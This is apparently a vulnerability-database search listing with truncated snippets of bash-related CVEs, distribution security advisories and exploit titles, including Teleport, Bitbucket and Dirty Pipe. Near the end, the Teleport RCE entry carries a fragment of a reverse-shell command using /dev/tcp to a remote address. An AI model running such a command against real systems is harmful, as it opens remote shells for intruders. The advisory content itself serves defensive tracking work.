2646 matches found
Azure CLI Code Injection CVE-2022-39327 hits 9.8/10 CVSS score
The most recent Azure CLI Code Injection vulnerability is a rare and dangerous case. It’s not often that the most popular cloud platform client is vulnerable to such critical issues as code injection. Regardless of the overall high risk of injections per the OWASP Top 10 and OWASP API Security Top 10, code...
CVE-2022-3715
A flaw was found in the bash package, where a heap-buffer overflow can occur in valid_parameter_transform. This issue may lead to memory problems...
Bash Buffer Error Vulnerability
Bash is a shell command language interpreter written for the GNU Project by the American developer Brian J. Fox; it runs on Unix-like operating systems. It is capable of reading and executing commands from standard input devices or files. A buffer error vulnerability exists in Bash...
PT-2022-5389 · Bash +6 · Bash +6
Name of the Vulnerable Software and Affected Versions: bash affected versions not specified Description: The issue is related to a heap-buffer overflow in the valid parameter transform function of the bash package, which can lead to memory problems. This can potentially allow a remote attacker to...
Exploit for Improper Initialization in Linux Linux_Kernel
Dirty Pipe
EulerOS Virtualization 3.0.6.0 : git (EulerOS-SA-2022-2559)
According to the versions of the git packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - Git for Windows is a fork of Git containing Windows-specific patches. This vulnerability affects users working on multi-user machine...
EulerOS Virtualization 3.0.6.6 : git (EulerOS-SA-2022-2500)
According to the versions of the git packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - Git for Windows is a fork of Git containing Windows-specific patches. This vulnerability affects users working on multi-user machine...
Arsenal - Recon Tool installer
Arsenal is a simple Bash shell script used to install the most important tools and requirements for your environment and save time installing all these tools.

Tools in Arsenal

Name | description
---|---
Amass | The OWASP Amass Project performs network mapping of attack surfaces and external...
Mageia: Security Advisory (MGASA-2022-0358)
The remote host is missing an update for the ... SPDX-FileCopyrightText: 2022 Greenbone AG. Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only ...
Updated bash packages fix security vulnerability
Bash has been updated to version 5.1.16 using a patch from Fedora to fix a security issue by adding a null check in the parameter_brace_transform function...
MGASA-2022-0358 Updated bash packages fix security vulnerability
Bash has been updated to version 5.1.16 using a patch from Fedora to fix a security issue by adding a null check in the parameter_brace_transform function...
[SECURITY] Fedora 35 Update: bash-5.1.8-3.fc35
The GNU Bourne Again shell (Bash) is a shell or command language interpreter that is compatible with the Bourne shell (sh). Bash incorporates useful features from the Korn shell (ksh) and the C shell (csh). Most sh scripts can be run by bash without modification...
Fedora: Security Advisory for bash (FEDORA-2022-5b644a935b)
The remote host is missing an update for the ...
PT-2022-37578 · Bash · Bash
Name of the Vulnerable Software and Affected Versions: Bash versions prior to 5.1.16 Description: A security issue was fixed in Bash by adding a null check in the parameter brace transform function. Recommendations: For versions prior to 5.1.16, update to version 5.1.16 to resolve the issue...
Fedora: Security Advisory for bash (FEDORA-2022-4ff296fe8e)
The remote host is missing an update for the ...
Fedora: Security Advisory for bash (FEDORA-2022-bf387ff344)
The remote host is missing an update for the ...
CVE-2022-40929
XXL-JOB 2.2.0 has a Command execution vulnerability in background tasks. NOTE: this is disputed because the issues/4929 report is about an intended and supported use case running arbitrary Bash scripts on behalf of users...
PT-2022-25627 · Xxl-Job · Xxl-Job
Name of the Vulnerable Software and Affected Versions: XXL-JOB versions 2.2.0 and prior Description: The issue concerns a Command execution vulnerability in background tasks, which is disputed as it may be an intended use case for running arbitrary Bash scripts on behalf of users. Recommendations...
Teleport 10.1.1 Remote Code Execution
Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE) Date: 08/01/2022 Exploit Author: Brandon Roach & Brian Landrum Vendor Homepage: https://goteleport.com Software Link: https://github.com/gravitational/teleport Version: /dev/tcp/10.0.0.1/5555 0&1...
Exploit for Argument Injection in Atlassian Bitbucket
CVE-2022-36804-PoC Multithreaded exploit script for CVE-2022-3...